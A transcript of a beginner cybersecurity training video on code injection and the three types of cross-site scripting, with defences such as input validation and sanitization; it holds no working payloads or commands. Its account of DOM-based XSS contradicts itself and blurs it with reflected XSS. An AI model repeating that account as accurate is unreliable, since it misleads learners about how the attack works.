Code Injection and Cross Site Scripting

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
7 hours 50 minutes
Difficulty
Beginner
CEU/CPE
8
Video Transcription
00:00
>> Let's start off by talking about Code Injection.
00:00
It's exactly what it sounds like.
00:00
An attacker injects code into
00:00
a backend database through a website,
00:00
usually through a form that is open to the public.
00:00
We fill out forms all the time on the Internet,
00:00
anytime you are buying something
00:00
online or filling out a survey and so forth.
00:00
Of course, what we enter into those forms,
00:00
gets dumped into a backend database.
00:00
But the thing is, if I'm allowed to enter
00:00
garbage and it gets processed on the backend database,
00:00
it can actually run a command that is very harmful.
00:00
You don't have to be a SQL engineer
00:00
to know that the command in
00:00
this cartoon drop table
00:00
is probably not going to be good for your database.
00:00
What do we do to mitigate this?
00:00
Input validation.
00:00
We make sure that what goes into
00:00
our database meets our rules.
00:00
We're going to validate things like datatype,
00:00
so if the form is asking for a date-time,
00:00
I'll make sure that the only field
00:00
accepts that type of data.
00:00
We restrict the field linked to
00:00
limit what a malicious actor can do.
00:00
Or even better, we give you a drop-down menu to select
00:00
from so you don't enter
00:00
something in a field that can be damaging.
00:00
That's all part of the input validation.
00:00
Now, input sanitization is comparable,
00:00
but what it will do is attempt
00:00
to clean up what is being entered.
00:00
For example, let's say we allowed
00:00
12 characters for a last name field,
00:00
but your last name is 14 characters.
00:00
Maybe you enter all 14 characters,
00:00
but data sanitization is going to truncate
00:00
the last two characters so that
00:00
your information is input as 12 characters.
00:00
The answer to code injection is
00:00
input validation and sanitization.
00:00
Let me just tell you, that's
00:00
the answer to a lot of issues.
00:00
Well-written web applications that
00:00
make sure the interface or
00:00
the scripting that pulls the entry of
00:00
the user ensures the data meets certain requirements.
00:00
There are utilities that
00:00
perform what's referred to as fuzzing,
00:00
which makes sure that the application has
00:00
the proper input validation and sanitization.
00:00
Now, some people will talk about running
00:00
fuzzing tools to see if they can
00:00
exploit weaknesses and vulnerabilities.
00:00
It's just like anything else.
00:00
Anything that was developed for
00:00
good also can be used for evil.
00:00
However the context is presented on the exam,
00:00
think about fuzzing as something that checks
00:00
an application for weak input control.
00:00
Now, one of the problems that can come from
00:00
poor input validation is cross-site scripting.
00:00
Cross-site scripting is really a major vulnerability.
00:00
It's been around for years and keeps continuing to show
00:00
up on the top 10 lists of most common vulnerabilities.
00:00
It's really something that we need
00:00
to work on in software development.
00:00
It's specifically geared towards web applications.
00:00
We have three basic types of cross-site scripting.
00:00
We have persistent, we have reflective,
00:00
and we have DOM-based.
00:00
DOM stands for Document Object Model.
00:00
The first type of cross-site scripting
00:00
we'll look at is persistent.
00:00
As an example of this type,
00:00
let's say that before you took this class,
00:00
you got to know which instructor
00:00
you wanted to take this class from.
00:00
Let's say each instructor gets to create
00:00
their own biography for you to
00:00
read so you can make your selection.
00:00
When you click on an instructor's picture,
00:00
it switches and loads the biography.
00:00
But what if an instructor also
00:00
injected a malicious script into the picture?
00:00
When you clicked on the picture,
00:00
the payload did something like capture
00:00
your sensitive information from
00:00
your system and send it to the attacker.
00:00
You can see how that's persistent because it'll be
00:00
sitting there in the picture for
00:00
whenever someone clicks on it.
00:00
Now, just for the record,
00:00
nothing like this exists in the picture for
00:00
this course's instructor on the Cybrary site.
00:00
This type of attack could be done in a lot of ways.
00:00
I always think of dating websites and
00:00
how quick people are to click on this image
00:00
or that image and
00:00
all those files were uploaded by strangers.
00:00
Who knows what can be in there?
00:00
It's up to the site to ensure that it's
00:00
coded to catch that type of thing and
00:00
prevent it and that the data
00:00
that is going in is sanitized.
00:00
But with social media, there are million ways that
00:00
we could become vulnerable to cross-site scripting.
00:00
Now, with reflective
00:00
cross-site scripting, it is non-persistent.
00:00
This starts off with the attacker who creates
00:00
a URL that has some malicious string in it.
00:00
The attacker sends that URL to the user somehow.
00:00
User clicks on that link
00:00
thinking is for a legitimate site,
00:00
but ultimately it takes the user to a rogue website.
00:00
Once the user clicks the malicious
00:00
URL and goes to the site,
00:00
it runs its payload on the user system.
00:00
It might be that this code causes some of
00:00
that user's sensitive information to be sent back
00:00
to the attacker based on the user's connection.
00:00
This is non-persistent because it's based
00:00
on this link that the attacker sent to the user.
00:00
Now, the last type of
00:00
cross-site scripting is called a DOM-based type.
00:00
That stands for Document Object Model-based.
00:00
With this type, an attacker crossed a URL
00:00
containing a malicious string and sends it to the victim.
00:00
The victim is tricked into opening the link
00:00
and requesting the malicious URL from the website.
00:00
The website includes the malicious string
00:00
and its response to the victim.
00:00
The victim's browser interprets the malicious code and
00:00
the server's response as part of
00:00
the legitimate web page and executes code.
00:00
Then the victim's sensitive information
00:00
is sent to the attacker's server.
00:00
An example of this might be
00:00
a case where I go to the website
00:00
that the attacker has sent me
00:00
and it asks me to fill in my name.
00:00
I fill in Kelly and press Enter.
00:00
Then I see a welcome screen that says, hello Kelly.
00:00
It is taking my input and using
00:00
my input to launch a second page.
00:00
There's nothing happening on
00:00
the web server that's been poisoned, so to speak.
00:00
It's more about the fact that they've
00:00
manipulated the code, so that way,
00:00
it modifies with the website returns
00:00
when the user enters the input.
00:00
I hope that makes sense.
00:00
It's not that the website has been compromised,
00:00
but they've tricked your system
00:00
to provide input that is going
00:00
to cause some malicious return on the web server's part.
00:00
It's all happening in the victim's web browser.
00:00
No modification at all to
00:00
the web server and that's what makes it DOM-based.
00:00
It has nothing to do with
00:00
the interaction of objects on the same system.
00:00
Nothing is happening on the website.
00:00
It's more that your system is being tricked
00:00
into requesting some malicious activity.
00:00
Cross-site scripting can be really nasty.
00:00
It usually includes some manipulation
00:00
where you go to a website and
00:00
get something malicious in return.
00:00
The best defense from a web
00:00
server perspective is to write
00:00
clean application that validate input and sanitize it.
00:00
From a user's perspective,
00:00
you can keep your browser up to
00:00
date and disable JavaScript,
00:00
except where it's absolutely necessary.
00:00
Those are some things you can do to keep it safe.
Up Next